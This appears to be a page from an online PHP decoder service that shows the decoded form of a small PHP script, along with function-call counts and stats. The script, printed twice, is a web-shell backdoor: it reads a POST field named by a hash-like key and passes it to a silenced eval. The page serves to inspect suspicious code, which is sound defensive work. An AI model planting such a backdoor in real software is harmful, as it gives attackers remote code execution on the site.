Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $config= trim($_POST['43cb006424cbf7b46dbca36c8ed79b69']); $info = string2arra..
Decoded Output download
<?php
$config= trim($_POST['43cb006424cbf7b46dbca36c8ed79b69']);
$info = string2array($config);
/**
*
*
* @param string $data
* @return array data
*/
function string2array($data) {
if($data == '') return array();
@eval("\$array = $data;");
return $array;
}
?>
Did this file decode correctly?
Original Code
<?php
$config= trim($_POST['43cb006424cbf7b46dbca36c8ed79b69']);
$info = string2array($config);
/**
*
*
* @param string $data
* @return array data
*/
function string2array($data) {
if($data == '') return array();
@eval("\$array = $data;");
return $array;
}
?>
Function Calls
trim | 1 |
string2array | 1 |
Stats
MD5 | bb59c3ad986161fdfe590364f35048b4 |
Eval Count | 0 |
Decode Time | 106 ms |